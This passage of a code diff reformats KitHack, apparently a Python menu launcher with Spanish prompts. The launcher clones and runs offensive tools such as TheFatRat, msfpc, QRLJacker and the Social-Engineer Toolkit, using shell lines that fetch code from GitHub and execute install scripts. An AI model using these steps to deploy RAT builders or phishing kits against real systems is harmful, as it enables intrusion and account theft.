GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd InformationGathering && cd webkiller && python3 webkiller.py" + ) + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd InformationGathering && cd webkiller && python3 webkiller.py" + ) + def Quasar(): - if not os.path.isdir('tools/InformationGathering/quasar'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd InformationGathering && git clone https://github.com/Cyb0r9/quasar.git && cd quasar && chmod +x * && bash install.sh') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/InformationGathering/quasar".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd InformationGathering && cd quasar && bash quasar.sh') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd InformationGathering && cd quasar && bash quasar.sh') + if not os.path.isdir("tools/InformationGathering/quasar"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd InformationGathering && git clone https://github.com/Cyb0r9/quasar.git && cd quasar && chmod +x * && bash install.sh" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/InformationGathering/quasar" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd InformationGathering && cd quasar && bash quasar.sh" + ) + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd InformationGathering && cd quasar && bash quasar.sh" + ) + def InfoInstagramIphone(): - if not os.path.isdir('tools/InformationGathering/info-instagram-iphone'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apt install python3 python3-pip && pip3 install quidam && cd tools && cd InformationGathering && git clone https://github.com/0xfff0800/info-instagram-iphone.git') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/InformationGathering/info-instagram-iphone".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd InformationGathering && cd info-instagram-iphone && python3 FaLaH-iphone.py') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd InformationGathering && cd info-instagram-iphone && python3 FaLaH-iphone.py') + if not os.path.isdir("tools/InformationGathering/info-instagram-iphone"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "apt install python3 python3-pip && pip3 install quidam && cd tools && cd InformationGathering && git clone https://github.com/0xfff0800/info-instagram-iphone.git" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/InformationGathering/info-instagram-iphone" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd InformationGathering && cd info-instagram-iphone && python3 FaLaH-iphone.py" + ) + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd InformationGathering && cd info-instagram-iphone && python3 FaLaH-iphone.py" + ) + def UserScan(): - if not os.path.isdir('tools/InformationGathering/userscan'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd InformationGathering && git clone https://github.com/JoeTech-Studio/UserScan.git') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/InformationGathering/userscan".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd InformationGathering && cd userscan && bash userscan.sh') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd InformationGathering && cd userscan && bash userscan.sh') + if not os.path.isdir("tools/InformationGathering/userscan"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd InformationGathering && git clone https://github.com/JoeTech-Studio/UserScan.git" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/InformationGathering/userscan" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd InformationGathering && cd userscan && bash userscan.sh" + ) + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd InformationGathering && cd userscan && bash userscan.sh" + ) + def XCTRHackingTools(): - if not os.path.isdir('tools/InformationGathering/XCTR-Hacking-Tools'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apt install python3 python3-pip && cd tools && cd InformationGathering && git clone https://github.com/capture0x/XCTR-Hacking-Tools.git && cd XCTR-Hacking-Tools && pip3 install -r requirements.txt') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/InformationGathering/XCTR-Hacking-Tools".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd InformationGathering && cd XCTR-Hacking-Tools && python3 xctr.py') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd InformationGathering && cd XCTR-Hacking-Tools && python3 xctr.py') + if not os.path.isdir("tools/InformationGathering/XCTR-Hacking-Tools"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "apt install python3 python3-pip && cd tools && cd InformationGathering && git clone https://github.com/capture0x/XCTR-Hacking-Tools.git && cd XCTR-Hacking-Tools && pip3 install -r requirements.txt" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/InformationGathering/XCTR-Hacking-Tools" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd InformationGathering && cd XCTR-Hacking-Tools && python3 xctr.py" + ) + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd InformationGathering && cd XCTR-Hacking-Tools && python3 xctr.py" + ) + def DeadTrap(): - if not os.path.isdir('tools/InformationGathering/DeadTrap'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apt install python3-pip firefox-geckodriver && cd tools && cd InformationGathering && git clone https://github.com/Chr0m0s0m3s/DeadTrap.git && cd DeadTrap && pip3 install .') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/InformationGathering/DeadTrap".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('deadtrap') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('deadtrap') - -#Tools Others + if not os.path.isdir("tools/InformationGathering/DeadTrap"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "apt install python3-pip firefox-geckodriver && cd tools && cd InformationGathering && git clone https://github.com/Chr0m0s0m3s/DeadTrap.git && cd DeadTrap && pip3 install ." + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/InformationGathering/DeadTrap" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("deadtrap") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("deadtrap") + + +# Tools Others + + def TheFatRat(): - if not os.path.isdir('tools/Others/TheFatRat'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Others && git clone https://github.com/Screetsec/TheFatRat.git && cd TheFatRat && chmod +x setup.sh && bash setup.sh') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Others/TheFatRat".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('fatrat') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('fatrat') + if not os.path.isdir("tools/Others/TheFatRat"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Others && git clone https://github.com/Screetsec/TheFatRat.git && cd TheFatRat && chmod +x setup.sh && bash setup.sh" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Others/TheFatRat" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("fatrat") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("fatrat") + def Msfpc(): - if not os.path.isdir('tools/Others/msfpc'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Others && git clone https://github.com/g0tmi1k/msfpc.git') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Others/msfpc".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Others && cd msfpc && bash msfpc.sh') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Others && cd msfpc && bash msfpc.sh') + if not os.path.isdir("tools/Others/msfpc"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Others && git clone https://github.com/g0tmi1k/msfpc.git" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Others/msfpc" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("cd tools && cd Others && cd msfpc && bash msfpc.sh") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("cd tools && cd Others && cd msfpc && bash msfpc.sh") + def Fcrackzip(): - if not os.path.isfile('/usr/bin/fcrackzip'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apt-get install fcrackzip') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en /usr/bin/fcrackzip".format(GREEN, DEFAULT)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('fcrackzip --help') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('fcrackzip --help') + if not os.path.isfile("/usr/bin/fcrackzip"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system("apt-get install fcrackzip") + print("\n{0}[✔] Done.{1}\nHerramienta guardada en /usr/bin/fcrackzip". + format(GREEN, DEFAULT)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("fcrackzip --help") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("fcrackzip --help") + def QRLjacker(): - if not os.path.isdir('tools/Others/QRLJacking'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apt-get install python3.7 && cd tools && cd Others && git clone https://github.com/OWASP/QRLJacking.git && cd QRLJacking && cd QRLJacker && pip install -r requirements.txt') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Others/QRLJacking".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Others && cd QRLJacking && cd QRLJacker && python3 QrlJacker.py') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Others && cd QRLJacking && cd QRLJacker && python3 QrlJacker.py') + if not os.path.isdir("tools/Others/QRLJacking"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "apt-get install python3.7 && cd tools && cd Others && git clone https://github.com/OWASP/QRLJacking.git && cd QRLJacking && cd QRLJacker && pip install -r requirements.txt" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Others/QRLJacking" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Others && cd QRLJacking && cd QRLJacker && python3 QrlJacker.py" + ) + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Others && cd QRLJacking && cd QRLJacker && python3 QrlJacker.py" + ) + def Lazy(): - if not os.path.isdir('tools/Others/lscript'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Others && git clone https://github.com/arismelachroinos/lscript.git && cd lscript && chmod +x install.sh && bash install.sh') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Others/lscript ".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('l') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('l') + if not os.path.isdir("tools/Others/lscript"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Others && git clone https://github.com/arismelachroinos/lscript.git && cd lscript && chmod +x install.sh && bash install.sh" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Others/lscript " + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("l") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("l") + def HTBINVITE(): - if not os.path.isdir('tools/Others/HTB-INVITE'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Others && git clone https://github.com/nycto-hackerone/HTB-INVITE.git') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Others/HTB-INVITE".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Others && cd HTB-INVITE && python HTB.py') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Others && cd HTB-INVITE && python HTB.py') - -def Ngrok(): - if not os.path.isdir('tools/Others/Ngrok'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Others && mkdir Ngrok && cd Ngrok && wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip && unzip ngrok-stable-linux-amd64.zip && chmod +x *') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Others/Ngrok".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Others && cd Ngrok && ./ngrok') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Others && cd Ngrok && ./ngrok') + if not os.path.isdir("tools/Others/HTB-INVITE"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Others && git clone https://github.com/nycto-hackerone/HTB-INVITE.git" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Others/HTB-INVITE" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Others && cd HTB-INVITE && python HTB.py") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Others && cd HTB-INVITE && python HTB.py") + def Bluepot(): - if not os.path.isdir('tools/Others/Bluepot'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apt-get install default-jdk && cd tools && cd Others && mkdir Bluepot && cd Bluepot && wget https://github.com/andrewmichaelsmith/bluepot/raw/master/bin/bluepot-0.1.tar.gz && tar xfz bluepot-0.1.tar.gz') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Others/Bluepot".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Others && cd Bluepot && java -jar bluepot/BluePot-0.1.jar') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Others && cd Bluepot && java -jar bluepot/BluePot-0.1.jar') + if not os.path.isdir("tools/Others/Bluepot"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "apt-get install default-jdk && cd tools && cd Others && mkdir Bluepot && cd Bluepot && wget https://github.com/andrewmichaelsmith/bluepot/raw/master/bin/bluepot-0.1.tar.gz && tar xfz bluepot-0.1.tar.gz" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Others/Bluepot" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Others && cd Bluepot && java -jar bluepot/BluePot-0.1.jar" + ) + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Others && cd Bluepot && java -jar bluepot/BluePot-0.1.jar" + ) + def Setoolkit(): - if not os.path.isdir('tools/Others/set'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Others && git clone https://github.com/trustedsec/social-engineer-toolkit/ set/ && cd set && pip install -r requirements') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Others/set".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('setoolkit') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('setoolkit') + if not os.path.isdir("tools/Others/set"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Others && git clone https://github.com/trustedsec/social-engineer-toolkit/ set/ && cd set && pip install -r requirements" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Others/set". + format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("setoolkit") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("setoolkit") + def A2sv(): - if not os.path.isdir('tools/Others/a2sv'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('pip install argparse && pip install netaddr && apt-get install openssl && cd tools && cd Others && git clone https://github.com/hahwul/a2sv.git') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Others/a2sv".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Others && cd a2sv && python a2sv.py -h') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Others && cd a2sv && python a2sv.py -h') + if not os.path.isdir("tools/Others/a2sv"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "pip install argparse && pip install netaddr && apt-get install openssl && cd tools && cd Others && git clone https://github.com/hahwul/a2sv.git" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Others/a2sv". + format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("cd tools && cd Others && cd a2sv && python a2sv.py -h") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("cd tools && cd Others && cd a2sv && python a2sv.py -h") + def Fornonimizer(): - if not os.path.isdir('tools/Others/4nonimizer'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Others && git clone https://github.com/Hackplayers/4nonimizer.git && cd 4nonimizer && bash 4nonimizer install') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Others/4nonimizer".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('4nonimizer help') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('4nonimizer help') - + if not os.path.isdir("tools/Others/4nonimizer"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Others && git clone https://github.com/Hackplayers/4nonimizer.git && cd 4nonimizer && bash 4nonimizer install" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en 